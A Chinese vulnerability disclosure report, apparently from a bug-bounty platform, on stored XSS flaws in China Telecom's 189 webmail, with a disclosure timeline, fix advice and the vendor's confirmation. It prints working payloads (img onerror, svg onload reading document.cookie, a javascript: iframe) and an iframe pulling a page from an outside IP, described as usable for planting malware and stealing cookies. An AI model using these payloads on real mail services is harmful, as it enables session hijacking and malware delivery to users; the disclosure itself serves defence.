2014-05-28:细节已通知厂商并且等待厂商处理中
2014-06-01:厂商已经确认,细节仅向厂商公开
2014-06-11:细节向核心白帽子及相关领域专家公开
2014-06-21:细节向普通白帽子公开
2014-07-01:细节向实习白帽子公开
2014-07-12:细节向公众公开
中国电信189邮箱多处存储型XSS漏洞
详细说明:中国电信189邮箱多处存储型的跨站漏洞
描述:
电信189邮箱在过滤on事件(仅仅在标签中才过滤,不在标签的不过滤),
还有javascript,data和expssion等标签,很难绕过,很头疼。
A.先来一个mxss漏洞
这样原因是在正文中过滤了,在标题中未过滤,且标题的过滤可以被轻松绕过
利用代码
<img src=1 onerror=alert(888) >
<svg onload="alert(document.cookie)"></svg>
aaaaaa<i onmouseover=alert(1)>aaaa
如图所示
打开邮件漏洞直接触发
其他标签就可使用<div><i>和<svg>
这个i标签必须回复转发下且鼠标在数字上触发,
svg下自动触发
b.这个漏洞是在签名处,由于在插入链接时可以闭合<a>标签,从而插入<iframe>标签
利用代码
<IFRAME SRC="javascript:alert(27);"></IFRAME>
测试过程
漏洞回复,转发时触发
代码代码执行
c.正文和快速回复处
它们未过滤iframe这个危险的标签。
且iframe只有进入一个外部的html文件就可以了,这个还可以挂马,危害很大
利用代码
<IFRAME SRC="http://182.124.1.1:8088/2.html"></IFRAME>
漏洞回复转发触发
代码执行
快速回复中可以插入iframe,测试有效,不在贴图证明
总结:过滤时要完全啊。盗取cookie的过程就是把执行的代码换成我们的js代码,
不在详述。
漏洞证明
修复方案:
漏洞防御:
1.对于xmss漏洞,正文中怎样过滤,标题中也怎样过滤
2.对签名处,正文处怎样过滤,签名处怎样过滤
3.正文和回复中,对iframe标签过滤
漏洞回应 厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-06-01 23:28
厂商回复:CNVD确认并复现所述情况,转由CNCERT协调中国电信集团公司通报处置。
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;